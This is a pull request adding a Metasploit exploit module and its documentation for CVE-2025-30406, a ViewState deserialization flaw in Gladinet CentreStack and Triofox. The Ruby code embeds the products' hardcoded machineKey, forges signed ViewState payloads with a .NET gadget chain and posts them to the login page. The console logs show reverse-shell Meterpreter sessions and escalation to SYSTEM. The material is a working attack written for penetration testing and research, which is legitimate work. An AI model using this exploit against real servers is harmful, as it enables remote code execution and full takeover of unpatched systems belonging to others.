### PR TITLE
Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization [CVE-2025-30406]

### DIFF
--- a/documentation/modules/exploit/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.md
+++ b/documentation/modules/exploit/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.md
@@ -69,6 +69,10 @@ Logged On Users : 2
 Meterpreter     : x64/windows
 meterpreter > pwd
 c:\windows\system32\inetsrv
+meterpreter > getsystem
+...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
 meterpreter >
 ```
 ###  Gladinet Triofox Build 16.1.10296.56315 on Windows Server 2019 - Windows Command target
@@ -96,6 +100,10 @@ Logged On Users : 14
 Meterpreter     : x64/windows
 meterpreter > pwd
 c:\windows\system32\inetsrv
+meterpreter > getsystem
+...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
 meterpreter >
 ```
 ## Limitations

--- a/documentation/modules/exploit/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.md
+++ b/documentation/modules/exploit/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.md
@@ -1,0 +1,102 @@
+## Vulnerable Application
+A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState
+could allow an attacker to forge ViewState data.
+This can lead to unauthorized actions such as remote code execution.
+Both applications make use of a hardcoded machineKey in the IIS web.config file, which is responsible for securing
+ASP.NET ViewState data. If an attacker obtains the machineKey, they can forge ViewState payloads that pass integrity checks.
+This can result in ViewState deserialization attacks, potentially leading to remote code execution (RCE) on the web server.
+
+* Gladinet CentreStack versions up to 16.4.10315.56368 are vulnerable (fixed in 16.4.10315.56368).
+* Gladinet Triofox versions up to 16.4.10317.56372 are vulnerable (fixed in 16.4.10317.56372)
+
+The following releases were tested.
+
+**Gladinet CentreStack and Triofox:**
+* Gladinet CentreStack Build 16.1.10296.56315 on Windows Server 2019
+* Gladinet Triofox Build 16.1.10296.56315 on Windows Server 2019
+
+## Installation steps to install Gladinet CentreStack or Triofox Enterprise Editions
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download an evaluation Windows Server iso image (2016, 2019 or 2022) and install it as a VM on your virtualization engine.
+* Note: Google is your best friend on how to do this ;-)
+* Download the [Gladinet CentreStack gui installer](https://www.centrestack.com/p/gce_latest_release.html) or...
+* Download the [Gladinet Triofox gui installer](https://access.triofox.com/releases_history/).
+* Note: For Triofox, you will need a free trail account to reach the installer page.
+* Run the gui installer on your Windows VM.
+* Reboot your VM and you should be able to access the application via `https://your_ip/portal/loginpage.aspx`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/windows/http/gladinet_viewstate_deserialization_cve_2025_30406`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=Windows Command>`
+- [ ] `exploit`
+- [ ] you should get a `shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+No specific options defined for this module.
+
+## Scenarios
+### Gladinet CentreStack Build 16.1.10296.56315 on Windows Server 2019 -  Windows Command target
+```msf
+msf6 > use exploits/windows/http/gladinet_viewstate_deserialization_cve_2025_30406
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > set rhosts 192.168.201.5
+rhosts => 192.168.201.5
+msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. CentreStack (Build 16.1.10296.56315)
+[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (203846 bytes) to 192.168.201.5
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.5:49897) at 2025-05-02 20:36:56 +0000
+
+meterpreter > getuid
+Server username: IIS APPPOOL\portal
+meterpreter > sysinfo
+Computer        : WIN-BJDNH44EEDB
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > pwd
+c:\windows\system32\inetsrv
+meterpreter >
+```
+###  Gladinet Triofox Build 16.1.10296.56315 on Windows Server 2019 - Windows Command target
+```msf
+msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Triofox (Build 16.1.10296.56315)
+[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (203846 bytes) to 192.168.201.6
+[*] Meterpreter session 4 opened (192.168.201.8:4444 -> 192.168.201.6:56815) at 2025-05-02 19:55:59 +0000
+
+meterpreter > getuid
+Server username: IIS APPPOOL\portal
+meterpreter > sysinfo
+Computer        : WIN-HHRQENPDSRS
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : EVIL
+Logged On Users : 14
+Meterpreter     : x64/windows
+meterpreter > pwd
+c:\windows\system32\inetsrv
+meterpreter >
+```
+## Limitations
+No limitations identified.

--- a/modules/exploits/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.rb
+++ b/modules/exploits/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.rb
@@ -10,6 +10,9 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
 
+  # base64 encoded machine key
+  MACHINE_KEY = 'NTQ5NjgzMjI0MkNDMzIyOEUyOTJFRUZGQ0RBMDg5MTQ5RDc4OUUwQzREN0MxQTVEMDJCQzU0MkY3QzYyNzlCRTlERDc3MEM5RURENUQ2N0M2NkI3RTYyMTQxMUQzRTU3RUExODFCQkY4OUZEMjE5NTdEQ0RERkFDRkQ5MjZFMTY='.freeze
+
   def initialize(info = {})
     super(
       update_info(
@@ -24,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
           the machineKey, they can forge ViewState payloads that pass integrity checks.
           This can result in ViewState deserialization attacks, potentially leading to
           remote code execution (RCE) on the web server.
-          Gladinet CentreStack through 16.1.10296.56315 is vulnerable (fixed in 16.4.10315.56368).
+          Gladinet CentreStack versions up to 16.4.10315.56368 are vulnerable (fixed in 16.4.10315.56368).
+          Gladinet Triofox versions up to 16.4.10317.56372 are vulnerable (fixed in 16.4.10317.56372).
         },
         'Author' => [
           'Huntress Team', # discovery and detailed vulnerability write up
@@ -33,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2025-30406'],
-          ['URL', 'https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild']
+          ['URL', 'https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild'],
+          ['URL', 'https://attackerkb.com/topics/7ebXn71J6O/cve-2025-30406']
         ],
         'Platform' => 'win',
         'Targets' => [
@@ -61,15 +66,33 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('TARGETURI', [ true, 'The base path to the Gladinet CentreStack application', '/' ])
+      OptString.new('TARGETURI', [ true, 'The base path to the Gladinet CentreStack or Triofox application', '/' ])
     ])
   end
 
   def execute_command(cmd, _opts = {})
+    # get the __VIEWSTATEGENERATOR value from the vulnerable page
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx')
+    })
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Non-200 HTTP response received while trying to get the __VIEWSTATEGENERATOR value.')
+    end
+
+    html = res.get_html_document
+    if html
+      # html identifier for the __VIEWSTATEGENERATOR: <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="3FE2630A" />
+      generator = html.css('input#__VIEWSTATEGENERATOR')[0]['value']
+      viewstate_generator = [generator.to_i(16)].pack('V') unless generator.nil?
+    else
+      viewstate_generator = ['3FE2630A'.to_i(16)].pack('V')
+    end
+
     output_format = 'raw'
-    viewstate_generator = ['3FE2630A'.to_i(16)].pack('V')
     viewstate_validation_algorithm = 'SHA256'
-    viewstate_validation_key = '5496832242CC3228E292EEFFCDA089149D789E0C4D7C1A5D02BC542F7C6279BE9DD770C9EDD5D67C66B7E621411D3E57EA181BBF89FD21957DCDDFACFD926E16'.scan(/../).map { |x| x.hex.chr }.join
+    viewstate_validation_key = [Base64.strict_decode64(MACHINE_KEY)].pack('H*')
+
     serialized = ::Msf::Util::DotNetDeserialization.generate(
       cmd,
       gadget_chain: :TextFormattingRunProperties,
@@ -94,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
     unless res&.code == 302
-      fail_with(Failure::UnexpectedReply, 'Non-302 HTTP response received while trying to execute the command')
+      fail_with(Failure::UnexpectedReply, 'Non-302 HTTP response received while trying to execute the payload.')
     end
   end
 
@@ -103,17 +126,28 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx')
     })
-    return CheckCode::Safe('Failed to identify that Gladinet CentreStack is running.') unless res&.code == 200 && res.body.include?('GLADINET')
+    return CheckCode::Safe('Failed to identify that Gladinet CentreStack or Triofox is running.') unless res&.code == 200 && res.body.include?('GLADINET')
 
-    build = res.body.match(/\(Build.*\)/)
-    unless build.nil?
-      version = Rex::Version.new(build[0].split(' ')[1].chomp(')'))
-      return CheckCode::Appears("CentreStack #{build}") if version <= Rex::Version.new('16.1.10296.56315')
-
-      return CheckCode::Safe("CentreStack #{build}")
+    if res.body.include?('CentreStack')
+      check_app = 'CentreStack'
+    elsif res.body.include?('Triofox')
+      check_app = 'Triofox'
+    else
+      check_app = 'Unknown'
     end
 
-    CheckCode::Unknown('No CentreStack build version detected.')
+    build = res.body.match(/\(Build.*\)/)
+    unless build.nil? || check_app == 'Unknown'
+      version = Rex::Version.new(build[0].split(' ')[1].chomp(')'))
+      if check_app == 'CentreStack'
+        return CheckCode::Appears("#{check_app} #{build}") if version < Rex::Version.new('16.4.10315.56368')
+      elsif check_app == 'Triofox'
+        return CheckCode::Appears("#{check_app} #{build}") if version < Rex::Version.new('16.4.10317.56372')
+      end
+      return CheckCode::Safe("#{check_app} #{build}")
+    end
+
+    CheckCode::Unknown('No CentreStack or Triofox application and/or build version detected.')
   end
 
   def exploit

--- a/modules/exploits/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.rb
+++ b/modules/exploits/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.rb
@@ -1,0 +1,123 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+require 'rex/exploit/view_state'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization',
+        'Description' => %q{
+          A vulnerability in Gladinet CentreStack and Triofox application using hardcoded
+          cryptographic keys for ViewState could allow an attacker to forge ViewState data.
+          This can lead to unauthorized actions such as remote code execution.
+          Both applications make use of a hardcoded machineKey in the IIS web.config file,
+          which is responsible for securing ASP.NET ViewState data. If an attacker obtains
+          the machineKey, they can forge ViewState payloads that pass integrity checks.
+          This can result in ViewState deserialization attacks, potentially leading to
+          remote code execution (RCE) on the web server.
+          Gladinet CentreStack through 16.1.10296.56315 is vulnerable (fixed in 16.4.10315.56368).
+        },
+        'Author' => [
+          'Huntress Team', # discovery and detailed vulnerability write up
+          'H00die Gr3y' # this metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-30406'],
+          ['URL', 'https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild']
+        ],
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_command
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-04-03',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => false
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the Gladinet CentreStack application', '/' ])
+    ])
+  end
+
+  def execute_command(cmd, _opts = {})
+    output_format = 'raw'
+    viewstate_generator = ['3FE2630A'.to_i(16)].pack('V')
+    viewstate_validation_algorithm = 'SHA256'
+    viewstate_validation_key = '5496832242CC3228E292EEFFCDA089149D789E0C4D7C1A5D02BC542F7C6279BE9DD770C9EDD5D67C66B7E621411D3E57EA181BBF89FD21957DCDDFACFD926E16'.scan(/../).map { |x| x.hex.chr }.join
+    serialized = ::Msf::Util::DotNetDeserialization.generate(
+      cmd,
+      gadget_chain: :TextFormattingRunProperties,
+      formatter: :LosFormatter
+    )
+
+    serialized = Rex::Exploit::ViewState.generate_viewstate(
+      serialized,
+      extra: viewstate_generator,
+      algo: viewstate_validation_algorithm,
+      key: viewstate_validation_key
+    )
+    transformed = ::Msf::Simple::Buffer.transform(serialized, output_format)
+    vprint_status(transformed.to_s)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx'),
+      'vars_post' => {
+        '__LASTFOCUS' => '',
+        '__VIEWSTATE' => transformed.to_s
+      }
+    })
+    unless res&.code == 302
+      fail_with(Failure::UnexpectedReply, 'Non-302 HTTP response received while trying to execute the command')
+    end
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx')
+    })
+    return CheckCode::Safe('Failed to identify that Gladinet CentreStack is running.') unless res&.code == 200 && res.body.include?('GLADINET')
+
+    build = res.body.match(/\(Build.*\)/)
+    unless build.nil?
+      version = Rex::Version.new(build[0].split(' ')[1].chomp(')'))
+      return CheckCode::Appears("CentreStack #{build}") if version <= Rex::Version.new('16.1.10296.56315')
+
+      return CheckCode::Safe("CentreStack #{build}")
+    end
+
+    CheckCode::Unknown('No CentreStack build version detected.')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    execute_command(payload.encoded)
+  end
+end

--- a/modules/exploits/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.rb
+++ b/modules/exploits/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.rb
@@ -27,8 +27,10 @@ class MetasploitModule < Msf::Exploit::Remote
           the machineKey, they can forge ViewState payloads that pass integrity checks.
           This can result in ViewState deserialization attacks, potentially leading to
           remote code execution (RCE) on the web server.
+
           Gladinet CentreStack versions up to 16.4.10315.56368 are vulnerable (fixed in 16.4.10315.56368).
           Gladinet Triofox versions up to 16.4.10317.56372 are vulnerable (fixed in 16.4.10317.56372).
+          NOTE: There are other rebranded services that might be vulnerable and can be detected by this module.
         },
         'Author' => [
           'Huntress Team', # discovery and detailed vulnerability write up
@@ -126,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx')
     })
-    return CheckCode::Safe('Failed to identify that Gladinet CentreStack or Triofox is running.') unless res&.code == 200 && res.body.include?('GLADINET')
+    return CheckCode::Safe('Failed to identify that Gladinet CentreStack/Triofox or similar service is running.') unless res&.code == 200 && res.body.include?('id="__VIEWSTATEGENERATOR" value="3FE2630A"')
 
     if res.body.include?('CentreStack')
       check_app = 'CentreStack'
@@ -136,18 +138,21 @@ class MetasploitModule < Msf::Exploit::Remote
       check_app = 'Unknown'
     end
 
-    build = res.body.match(/\(Build.*\)/)
-    unless build.nil? || check_app == 'Unknown'
-      version = Rex::Version.new(build[0].split(' ')[1].chomp(')'))
+    build = res.body.match(/\(Build\s*.*\)/)
+    unless build.nil?
+      version = build[0].gsub(/[[:space:]]/, '').split('Build')[1].chomp(')')
+      rex_version = Rex::Version.new(version)
       if check_app == 'CentreStack'
-        return CheckCode::Appears("#{check_app} #{build}") if version < Rex::Version.new('16.4.10315.56368')
+        return CheckCode::Appears("Service #{check_app} (Build #{version})") if rex_version < Rex::Version.new('16.4.10315.56368')
       elsif check_app == 'Triofox'
-        return CheckCode::Appears("#{check_app} #{build}") if version < Rex::Version.new('16.4.10317.56372')
+        return CheckCode::Appears("Service #{check_app} (Build #{version})") if rex_version < Rex::Version.new('16.4.10317.56372')
+      elsif check_app == 'Unknown'
+        return CheckCode::Detected("Service #{check_app} (Build #{version})") if rex_version < Rex::Version.new('16.4.10317.56372')
       end
-      return CheckCode::Safe("#{check_app} #{build}")
+      return CheckCode::Safe("Service #{check_app} (Build #{version})")
     end
 
-    CheckCode::Unknown('No CentreStack or Triofox application and/or build version detected.')
+    CheckCode::Detected("Service #{check_app} (Build not detected)")
   end
 
   def exploit


### PR DESCRIPTION
A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker to forge ViewState data. This can lead to unauthorized actions such as remote code execution.
Both applications make use of a hardcoded machineKey in the IIS `web.config` file which is responsible for securing ASP.NET ViewState data. If an attacker obtains the machineKey, they can forge ViewState payloads that pass integrity checks.
This can result in ViewState deserialization attacks, potentially leading to remote code execution (RCE) on the web server.

Gladinet CentreStack through `16.1.10296.56315` is vulnerable (fixed in `16.4.10315.56368`).

You can test it by downloading a vulnerable Gladinet CentreStack ISO from [here](https://s3.amazonaws.com/gladinetsupport/16.1.10296.56315/gladinet/GCE10296.iso).

NOTE: There are other rebranded services that might be vulnerable and can be detected by this module.

~~WORK TO BE DONE:~~
~~* Adding support for the Gladinet Triofox application.~~
~~* Writing Documentation~~

### Module in action:
```
msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.201.8:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
[*] Sending stage (203846 bytes) to 192.168.201.5
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.5:53406) at 2025-04-28 21:14:22 +0000

meterpreter > getuid
Server username: IIS APPPOOL\portal
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```

02/04/2025: Included Triofox
```
msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > set rhosts 192.168.201.6
rhosts => 192.168.201.6
msf6 exploit(windows/http/gladinet_viewstate_deserialization_cve_2025_30406) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Triofox (Build 16.1.10296.56315)
[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
[*] Sending stage (203846 bytes) to 192.168.201.6
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.6:57348) at 2025-05-02 22:09:05 +0000

meterpreter > sysinfo
Computer        : WIN-HHRQENPDSRS
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : EVIL
Logged On Users : 14
Meterpreter     : x64/windows
meterpreter > getuid
Server username: IIS APPPOOL\portal
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
 